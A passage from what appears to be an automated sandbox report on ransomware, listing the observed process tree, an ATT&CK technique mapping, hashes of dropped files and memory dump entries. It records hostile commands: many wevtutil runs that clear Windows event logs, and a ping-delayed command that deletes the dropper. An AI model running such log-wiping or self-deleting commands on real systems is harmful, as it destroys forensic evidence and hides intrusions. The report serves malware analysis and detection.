wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
5⤵
PID:892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
5⤵
PID:1840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
5⤵
PID:1676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
5⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
5⤵
PID:1336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
5⤵
PID:1668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
5⤵
PID:520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
5⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
5⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
5⤵
PID:328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
5⤵
PID:1072

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
5⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
5⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
5⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
5⤵
PID:1652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
5⤵
PID:1216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
5⤵
PID:1884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
5⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
5⤵
PID:1392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
5⤵
PID:764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
5⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
5⤵
PID:916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
5⤵
PID:1620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
5⤵
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
5⤵
PID:624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
5⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
5⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
5⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
5⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
5⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
5⤵
PID:828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
5⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
5⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
5⤵
PID:1712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
5⤵
PID:1116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
5⤵
PID:792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
5⤵
PID:1192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
5⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
5⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
5⤵
PID:1668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
5⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
5⤵
PID:204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
5⤵
PID:1196

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
5⤵
PID:1136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
5⤵
PID:1692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
5⤵
PID:428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
5⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
5⤵
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
5⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
5⤵
PID:1112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
5⤵
PID:1660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
5⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
5⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
5⤵
PID:768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
5⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
5⤵
PID:560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
5⤵
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
5⤵
PID:1492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
5⤵
PID:1624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
5⤵
PID:560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Windows\BackupXXXA8C4AD38.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Windows\BackupXXXA8C4AD38.exe"
4⤵
PID:1472

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 100
5⤵
- Runs ping.exe
PID:328

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 900
5⤵
- Runs ping.exe
PID:2032

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1192

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:1612

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:1072

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\#FILES-ENCRYPTED.txt
1⤵
PID:520

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Winlogon Helper DLL

T1004

Change Default File Association

T1042

Modify Existing Service

T1031

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Modify Registry

T1112

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Indicator Removal on Host

T1070

File Deletion

T1107

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1.cmd
Filesize
1KB

MD5
a8b8899b9c4599546e0596a1d6e1332f

SHA1
9142a32cc0526b2fed62754388a0a35a4b6921f0

SHA256
0a81b5234134f1186616bfbb571c055ec07f0fcafa5fd4fa59149b93e2cd4f59

SHA512
8d2f4add3bfd69f5603d1c8646fd09fe35f746c63e069621f3b9bf171eac364a3ff59455571e473254788cab99dddcc1d3258a2be73d6e2b2d29b9ed5b563e8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.bat
Filesize
1KB

MD5
9471e94bb50fcd17ffdf7eb84e648776

SHA1
ca575ae7cb94b74dd5ee54aa6007b6ca1f6f0f26

SHA256
8c009bbf6ae9c828227bb89694915e783e0f985023ac3cd36c076ca922d84010

SHA512
8617cb07fa9a61525498251a9f2f3c38c7930adf821147aa4add9ac332590d4350ade334831a584d4a4ad9e155c94bee5711b529f2efd623d65c3927a58122bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.bat
Filesize
1KB

MD5
31646fdb95c35456cdc2307b5db6bd8a

SHA1
50bb71e1675b408c25e05a4a5a63cae51d46f556

SHA256
9bbd9e0afa90db07b12d185875a6a76213680ddada8d83a7a7a467e4b9337efd

SHA512
4ba1097d0e8b2c59d4b4acb5e5b2901b336b64544774a28966eb7da6f9ae00adeebb31af8722d4007973c1c3a14e5459dc03e9446ad54261b68bc6a8556512b0

Download Submit
C:\Users\Admin\AppData\Roaming\#FILES-ENCRYPTED.txt
Filesize
368B

MD5
8d117c7fb94ef6359ea6e536a760318a

SHA1
2a7b4f60c5cf106695248a1a188134984ea96a18

SHA256
24667668b577b03299bd6d5743a91869d9cd6e003c606235063b796f3f310a42

SHA512
367a4aeb4ffff1804c9e4444551774bfbc059f97b7b2214c7daa673434b63e8d1c9e8dd1b9ee4ae378aa76ee58c68c7007b712f401bd484f5ef880984a8a6bff

Download Submit
C:\Users\Admin\AppData\Roaming\encoderdecryption@yandex.ru.exe
Filesize
1.8MB

MD5
f477c3bd9d9599a59affb41a8807f8ae

SHA1
1fee4f5bda8b765acbb741aeebfe74ea9b0f0f4e

SHA256
d2c47b1c94e6beadbc222771e788e9dafe194c462760b0d16cd25cbc0a572a00

SHA512
75060be4bbd7fee8ce455e533a6fb8d7b48e64daf90266e6d346f51545e2922c78497e6eb8937de2102e2fff98c9645eb78c7785dc145d9d3d838ac94f417257

Download Submit
C:\Users\Admin\AppData\Roaming\encoderdecryption@yandex.ru.exe
Filesize
1.8MB

MD5
f477c3bd9d9599a59affb41a8807f8ae

SHA1
1fee4f5bda8b765acbb741aeebfe74ea9b0f0f4e

SHA256
d2c47b1c94e6beadbc222771e788e9dafe194c462760b0d16cd25cbc0a572a00

SHA512
75060be4bbd7fee8ce455e533a6fb8d7b48e64daf90266e6d346f51545e2922c78497e6eb8937de2102e2fff98c9645eb78c7785dc145d9d3d838ac94f417257

Download Submit
C:\Users\Admin\Desktop\#FILES-ENCRYPTED.txt
Filesize
368B

MD5
8d117c7fb94ef6359ea6e536a760318a

SHA1
2a7b4f60c5cf106695248a1a188134984ea96a18

SHA256
24667668b577b03299bd6d5743a91869d9cd6e003c606235063b796f3f310a42

SHA512
367a4aeb4ffff1804c9e4444551774bfbc059f97b7b2214c7daa673434b63e8d1c9e8dd1b9ee4ae378aa76ee58c68c7007b712f401bd484f5ef880984a8a6bff

Download Submit
C:\Windows\A8C4AD38.bat
Filesize
2KB

MD5
fc2625b2b82df843e8e623da4f16d683

SHA1
d94d73a53bd7ddb16dc4521329294ae9406c8761

SHA256
c5df8af0540e951cb0fcf6ec85cf9edc22cb006618693d9d5bfb4306d965818e

SHA512
cf6f6020b5711fe95f55faec1a1ed6bdfb14424b437af6d0053abcf70f5a31edfbedf3ad80c512e51eb0de4ce19e7b31d2b2fd188cb4b7057c879ba7635519dd

Download Submit
C:\Windows\BackupXXXA8C4AD38.exe
Filesize
374KB

MD5
2aa935e2c8193c117aad01d27fdd3727

SHA1
3481cfb147830ccc497abbf2dfefc8893876aaaa

SHA256
e836eb8b2fd9b8b20aee4a51c0906d935e9a0af6c8a1510ef2a6a0b0eecb8b37

SHA512
969096f17ac042aff531d20470a92477c480b23eb59298d48efcfdf5ccc64ba47ec7965c183b926db254a92854c8dd20e7e82ada7dd3a851a1860407c59aff2f

Download Submit
C:\Windows\BackupXXXA8C4AD38.exe
Filesize
374KB

MD5
2aa935e2c8193c117aad01d27fdd3727

SHA1
3481cfb147830ccc497abbf2dfefc8893876aaaa

SHA256
e836eb8b2fd9b8b20aee4a51c0906d935e9a0af6c8a1510ef2a6a0b0eecb8b37

SHA512
969096f17ac042aff531d20470a92477c480b23eb59298d48efcfdf5ccc64ba47ec7965c183b926db254a92854c8dd20e7e82ada7dd3a851a1860407c59aff2f

Download Submit
memory/212-102-0x0000000000000000-mapping.dmp

Download
memory/216-83-0x0000000000000000-mapping.dmp

Download
memory/228-141-0x0000000000000000-mapping.dmp

Download
memory/232-101-0x0000000000000000-mapping.dmp

Download
memory/232-125-0x0000000000000000-mapping.dmp

Download
memory/288-105-0x0000000000000000-mapping.dmp

Download
memory/316-77-0x0000000000000000-mapping.dmp

Download
memory/328-144-0x0000000000000000-mapping.dmp

Download
memory/520-76-0x0000000000000000-mapping.dmp

Download
memory/540-90-0x0000000000000000-mapping.dmp

Download
memory/540-67-0x0000000000000000-mapping.dmp

Download
memory/556-54-0x0000000001140000-0x0000000001308000-memory.dmp

Filesize
1.8MB

Download
memory/556-65-0x000007FEF2F40000-0x000007FEF3B7F000-memory.dmp

Filesize
12.2MB

Download
memory/556-62-0x000007FEF3B80000-0x000007FEF5108000-memory.dmp

Filesize
21.5MB

Download
memory/560-118-0x0000000000000000-mapping.dmp

Download
memory/560-70-0x0000000000000000-mapping.dmp

Download
memory/576-85-0x0000000000000000-mapping.dmp

Download
memory/580-75-0x0000000000000000-mapping.dmp

Download
memory/636-72-0x0000000000000000-mapping.dmp

Download
memory/768-104-0x0000000000000000-mapping.dmp

Download
memory/768-127-0x0000000000000000-mapping.dmp

Download
memory/828-74-0x0000000000000000-mapping.dmp

Download
memory/868-93-0x0000000000000000-mapping.dmp

Download
memory/956-110-0x0000000000000000-mapping.dmp

Download
memory/980-123-0x0000000000000000-mapping.dmp

Download
memory/980-98-0x0000000000000000-mapping.dmp

Download
memory/1016-79-0x0000000000000000-mapping.dmp

Download
memory/1076-108-0x0000000000000000-mapping.dmp

Download
memory/1080-124-0x0000000000000000-mapping.dmp

Download
memory/1080-99-0x0000000000000000-mapping.dmp

Download
memory/1092-71-0x0000000000000000-mapping.dmp

Download
memory/1112-106-0x0000000000000000-mapping.dmp

Download
memory/1116-97-0x0000000000000000-mapping.dmp

Download
memory/1216-129-0x0000000000000000-mapping.dmp

Download
memory/1224-69-0x0000000000000000-mapping.dmp

Download
memory/1244-87-0x0000000000000000-mapping.dmp

Download
memory/1308-78-0x0000000000000000-mapping.dmp

Download
memory/1308-92-0x0000000000000000-mapping.dmp

Download
memory/1392-64-0x0000000000000000-mapping.dmp

Download
memory/1472-137-0x0000000000000000-mapping.dmp

Download
memory/1476-82-0x0000000000000000-mapping.dmp

Download
memory/1484-148-0x0000000000000000-mapping.dmp

Download
memory/1488-145-0x0000000000000000-mapping.dmp

Download
memory/1492-88-0x0000000000000000-mapping.dmp

Download
memory/1500-100-0x0000000000000000-mapping.dmp

Download
memory/1516-131-0x0000000000000000-mapping.dmp

Download
memory/1520-138-0x0000000000000000-mapping.dmp

Download
memory/1528-59-0x0000000000000000-mapping.dmp

Download
memory/1544-96-0x0000000000000000-mapping.dmp

Download
memory/1544-61-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp

Filesize
8KB

Download
memory/1544-139-0x0000000000000000-mapping.dmp

Download
memory/1544-60-0x0000000000000000-mapping.dmp

Download
memory/1628-94-0x0000000000000000-mapping.dmp

Download
memory/1648-95-0x0000000000000000-mapping.dmp

Download
memory/1676-184-0x000007FEF1FF0000-0x000007FEF2F3D000-memory.dmp

Filesize
15.3MB

Download
memory/1676-528-0x000007FEF1FF0000-0x000007FEF2F3D000-memory.dmp

Filesize
15.3MB

Download
memory/1676-181-0x000007FEEE2C0000-0x000007FEEED10000-memory.dmp

Filesize
10.3MB

Download
memory/1676-142-0x000007FEF3B80000-0x000007FEF5108000-memory.dmp

Filesize
21.5MB

Download
memory/1676-143-0x000007FEF2F40000-0x000007FEF3B7F000-memory.dmp

Filesize
12.2MB

Download
memory/1676-113-0x0000000000000000-mapping.dmp

Download
memory/1676-120-0x000007FEF2F40000-0x000007FEF3B7F000-memory.dmp

Filesize
12.2MB

Download
memory/1676-116-0x0000000001330000-0x0000000001394000-memory.dmp

Filesize
400KB

Download
memory/1676-119-0x000007FEF3B80000-0x000007FEF5108000-memory.dmp

Filesize
21.5MB

Download
memory/1676-135-0x000007FEF5D70000-0x000007FEF5F58000-memory.dmp

Filesize
1.9MB

Download
memory/1712-122-0x0000000000000000-mapping.dmp

Download
memory/1712-80-0x0000000000000000-mapping.dmp

Download
memory/1772-208-0x000007FEF24F0000-0x000007FEF2F40000-memory.dmp

Filesize
10.3MB

Download
memory/1772-301-0x000007FEF1C60000-0x000007FEF24EC000-memory.dmp

Filesize
8.5MB

Download
memory/1772-55-0x0000000000000000-mapping.dmp

Download
memory/1772-548-0x000007FEF1C60000-0x000007FEF24EC000-memory.dmp

Filesize
8.5MB

Download
memory/1772-63-0x000007FEF3B80000-0x000007FEF5108000-memory.dmp

Filesize
21.5MB

Download
memory/1772-66-0x000007FEF2F40000-0x000007FEF3B7F000-memory.dmp

Filesize
12.2MB

Download
memory/1772-58-0x00000000003E0000-0x00000000005A8000-memory.dmp

Filesize
1.8MB

Download
memory/1772-545-0x000007FEEDD40000-0x000007FEEED01000-memory.dmp

Filesize
15.8MB

Download
memory/1772-515-0x000007FEF6600000-0x000007FEF675E000-memory.dmp

Filesize
1.4MB

Download
memory/1772-109-0x000007FEF6600000-0x000007FEF675E000-memory.dmp

Filesize
1.4MB

Download
memory/1772-547-0x000007FEF5E30000-0x000007FEF5F5A000-memory.dmp

Filesize
1.2MB

Download
memory/1772-397-0x000007FEF3B80000-0x000007FEF5108000-memory.dmp

Filesize
21.5MB

Download
memory/1772-399-0x000007FEF2F40000-0x000007FEF3B7F000-memory.dmp

Filesize
12.2MB

Download
memory/1772-543-0x000007FEF24F0000-0x000007FEF2F40000-memory.dmp

Filesize
10.3MB

Download
memory/1772-261-0x000007FEEDD40000-0x000007FEEED01000-memory.dmp

Filesize
15.8MB

Download
memory/1772-265-0x000007FEF5E30000-0x000007FEF5F5A000-memory.dmp

Filesize
1.2MB

Download
memory/1820-73-0x0000000000000000-mapping.dmp

Download
memory/1840-89-0x0000000000000000-mapping.dmp

Download
memory/1884-107-0x0000000000000000-mapping.dmp

Download
memory/1884-146-0x0000000000000000-mapping.dmp

Download
memory/1972-91-0x0000000000000000-mapping.dmp

Download
memory/1976-133-0x0000000000000000-mapping.dmp

Download
memory/1988-150-0x0000000000000000-mapping.dmp

Download
memory/1988-130-0x0000000000000000-mapping.dmp

Download
memory/2004-126-0x0000000000000000-mapping.dmp

Download
memory/2024-103-0x0000000000000000-mapping.dmp

Download